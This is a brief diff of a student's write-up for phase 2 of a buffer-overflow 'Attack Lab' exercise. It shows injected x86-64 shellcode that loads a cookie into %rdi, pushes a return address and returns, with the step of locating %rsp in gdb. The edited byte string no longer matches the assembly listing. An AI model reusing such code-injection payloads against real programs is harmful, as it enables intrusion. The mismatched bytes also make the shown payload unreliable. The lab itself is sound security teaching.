magna25/Attack-Lab/Phase 2.md

 0000000000000000 <.text>:
    0:	48 c7 c7 70 4b 4b 43 	mov    $0x434b4b70,%rdi
-   7:	68 8c 17 40 00       	pushq  $0x40178c
    c:	c3                   	retq
 ```

-The byte representation of the assembly code is `48 c7 c7 70 4b 4b 43 68 8c 17 40 00 c3`
+The byte representation of the assembly code is `48 c7 c7 70 4b 4b 43 c3`

-Now you need to find the address of the %rsp register and pass it as the return address since it will execute our injected code
+Now we need to find the address of rsp register

 run ctarget through gdb